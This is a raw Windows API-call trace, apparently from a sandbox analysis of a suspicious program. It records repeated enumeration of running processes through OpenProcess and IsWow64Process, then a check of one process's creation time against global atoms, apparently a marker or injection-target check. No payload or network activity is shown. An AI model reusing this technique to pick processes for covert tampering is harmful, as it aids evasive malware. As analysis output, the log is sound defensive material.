	[0117.340] CloseHandle (hObject=0x698) returned 1
	[0117.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.340] CloseHandle (hObject=0x698) returned 1
	[0117.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.340] CloseHandle (hObject=0x698) returned 1
	[0117.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.340] CloseHandle (hObject=0x698) returned 1
	[0117.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.341] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.341] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.341] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.342] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.342] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.342] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.342] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.343] CloseHandle (hObject=0x698) returned 1
	[0117.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.343] CloseHandle (hObject=0x698) returned 1
	[0117.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.343] CloseHandle (hObject=0x698) returned 1
	[0117.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.343] CloseHandle (hObject=0x698) returned 1
	[0117.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.582] CloseHandle (hObject=0x698) returned 1
	[0117.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.582] CloseHandle (hObject=0x698) returned 1
	[0117.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.582] CloseHandle (hObject=0x698) returned 1
	[0117.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.583] CloseHandle (hObject=0x698) returned 1
	[0117.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.583] CloseHandle (hObject=0x698) returned 1
	[0117.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.583] CloseHandle (hObject=0x698) returned 1
	[0117.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.587] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.587] CloseHandle (hObject=0x698) returned 1
	[0117.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.587] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.587] CloseHandle (hObject=0x698) returned 1
	[0117.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.588] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.588] CloseHandle (hObject=0x698) returned 1
	[0117.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.588] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.588] CloseHandle (hObject=0x698) returned 1
	[0117.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.588] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.588] CloseHandle (hObject=0x698) returned 1
	[0117.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.589] CloseHandle (hObject=0x698) returned 1
	[0117.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.589] CloseHandle (hObject=0x698) returned 1
	[0117.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.589] CloseHandle (hObject=0x698) returned 1
	[0117.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.589] CloseHandle (hObject=0x698) returned 1
	[0117.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.590] CloseHandle (hObject=0x698) returned 1
	[0117.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.590] CloseHandle (hObject=0x698) returned 1
	[0117.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.590] CloseHandle (hObject=0x698) returned 1
	[0117.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.590] CloseHandle (hObject=0x698) returned 1
	[0117.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.590] CloseHandle (hObject=0x698) returned 1
	[0117.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.591] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.591] CloseHandle (hObject=0x698) returned 1
	[0117.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.591] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.591] CloseHandle (hObject=0x698) returned 1
	[0117.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.591] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.591] CloseHandle (hObject=0x698) returned 1
	[0117.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.591] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.591] CloseHandle (hObject=0x698) returned 1
	[0117.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.591] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.591] CloseHandle (hObject=0x698) returned 1
	[0117.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.592] CloseHandle (hObject=0x698) returned 1
	[0117.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.592] CloseHandle (hObject=0x698) returned 1
	[0117.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.592] CloseHandle (hObject=0x698) returned 1
	[0117.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.592] CloseHandle (hObject=0x698) returned 1
	[0117.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.593] CloseHandle (hObject=0x698) returned 1
	[0117.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.593] CloseHandle (hObject=0x698) returned 1
	[0117.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.593] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.594] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.594] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.594] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.595] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.595] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.595] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.595] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.595] CloseHandle (hObject=0x698) returned 1
	[0117.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.595] CloseHandle (hObject=0x698) returned 1
	[0117.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.596] CloseHandle (hObject=0x698) returned 1
	[0117.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.596] CloseHandle (hObject=0x698) returned 1
	[0117.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.638] CloseHandle (hObject=0x698) returned 1
	[0117.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.639] CloseHandle (hObject=0x698) returned 1
	[0117.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.639] CloseHandle (hObject=0x698) returned 1
	[0117.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.639] CloseHandle (hObject=0x698) returned 1
	[0117.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.639] CloseHandle (hObject=0x698) returned 1
	[0117.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.640] CloseHandle (hObject=0x698) returned 1
	[0117.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.640] CloseHandle (hObject=0x698) returned 1
	[0117.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.640] CloseHandle (hObject=0x698) returned 1
	[0117.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.640] CloseHandle (hObject=0x698) returned 1
	[0117.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.641] CloseHandle (hObject=0x698) returned 1
	[0117.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.642] CloseHandle (hObject=0x698) returned 1
	[0117.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.642] CloseHandle (hObject=0x698) returned 1
	[0117.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.642] CloseHandle (hObject=0x698) returned 1
	[0117.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.642] CloseHandle (hObject=0x698) returned 1
	[0117.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.643] CloseHandle (hObject=0x698) returned 1
	[0117.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.643] CloseHandle (hObject=0x698) returned 1
	[0117.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.643] CloseHandle (hObject=0x698) returned 1
	[0117.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.643] CloseHandle (hObject=0x698) returned 1
	[0117.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.644] CloseHandle (hObject=0x698) returned 1
	[0117.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.644] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.644] CloseHandle (hObject=0x698) returned 1
	[0117.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.644] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.644] CloseHandle (hObject=0x698) returned 1
	[0117.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.644] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.644] CloseHandle (hObject=0x698) returned 1
	[0117.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.644] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.644] CloseHandle (hObject=0x698) returned 1
	[0117.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.645] CloseHandle (hObject=0x698) returned 1
	[0117.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.645] CloseHandle (hObject=0x698) returned 1
	[0117.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.645] CloseHandle (hObject=0x698) returned 1
	[0117.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.645] CloseHandle (hObject=0x698) returned 1
	[0117.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.646] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.646] CloseHandle (hObject=0x698) returned 1
	[0117.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.646] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.646] CloseHandle (hObject=0x698) returned 1
	[0117.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.647] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.647] CloseHandle (hObject=0x698) returned 1
	[0117.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.647] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.647] CloseHandle (hObject=0x698) returned 1
	[0117.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.647] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.649] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.649] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.649] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.649] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.649] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.649] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.650] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.650] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
